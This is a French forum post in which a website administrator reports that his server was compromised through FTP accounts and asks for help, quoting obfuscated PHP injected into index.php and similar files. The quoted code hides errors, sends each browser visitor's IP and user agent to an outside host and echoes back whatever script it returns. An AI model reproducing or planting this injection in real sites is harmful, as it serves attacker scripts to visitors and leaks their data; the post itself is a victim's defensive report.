toTOW http://www.fah-addict.net/ | Bonjour à tous,
Aujourd'hui, je viens de me rendre compte que mon serveur avait été compromis. Les premiers symptômes ont été l'apparition de pages blanches sur certains des sites hébergés (problème qui peut disparaitre en environ une journée).
J'ai donc décidé de regarder de plus près les pages posant problème, et j'ai remarqué que certains fichiers (principalement du index.php, login.php, header.php, footer.php et leurs variantes) ont été modifiés, et au vu des dates, je sais que ce n'est pas de mon fait.
En regardant le contenu des fichiers modifiés, j'ai trouvé ce genre de code :
Code :
- <?php
- #483acf#
- error_reporting(0); ini_set('display_errors',0); $wp_t91192 = @$_SERVER['HTTP_USER_AGENT'];
- if (( preg_match ('/Gecko|MSIE/i', $wp_t91192) && !preg_match ('/bot/i', $wp_t91192))){
- $wp_t0991192="http://"."tag"."modules".".com/modules"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_t91192);
- $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_t0991192);
- curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_91192t = curl_exec ($ch); curl_close($ch);}
- if ( substr($wp_91192t,1,3) === 'scr' ){ echo $wp_91192t; }
- #/483acf#
- ?>
- <?php
- ?>
- <?php
- ?>
- <?php
- ?>
- <?php
- ?>
|
Les pages blanches s'expliquent donc par la désactivation des erreurs par ce bout de code, qui à mon avis peut être foireux (il n'est pas toujours identique suivant les fichiers). D'après ce que j'ai compris, ce bout de script va chercher du code sur un serveur distant pour l'exécuter. Je n'ai aucune idée de ce que le code distant fait (mais je soupçonne qu'il tente de propager un trojan ou de de voler des informations). Si quelqu'un a déjà rencontré ce problème, je veux bien quelques explications de plus ...
En fouillant dans les logs, j'ai trouvé que les modifications des fichiers proviennent du FTP et qu'elles sont effectuées avec les comptes utilisateurs associés. Je suppose donc que le pirate a réussi à récupérer la liste des mots de passe des comptes FTP, mais pour cette partie, je ne me l'explique pas ...
Mon antivirus n'a pas protesté lors du surf sur les pages modifiées, ni lors du scan de mes machines qui vient de se terminer ...
Si vous avez des idées, n'hésitez pas à m'en faire part ... j'ai un peu peur de me lancer dans le changement de tous les mots de passe et dans le nettoyage des fichiers modifiés en ne sachant pas trop d'où est venue l'obtention des mot de passe FTP ...
edit : j'oublais la configuration du serveur (qui commence à dater) : Ubuntu Server 10.04.4 LTS (Lucid Lynx), Apache2, MySQL, PHP5, Proftpd. Tout le monde est bien à jour depuis les dépots. Message édité par toTOW le 05-01-2014 à 23:16:48 ---------------
[b] FAH-Addict, première source d'information francophone sur le projet Folding@Home.
|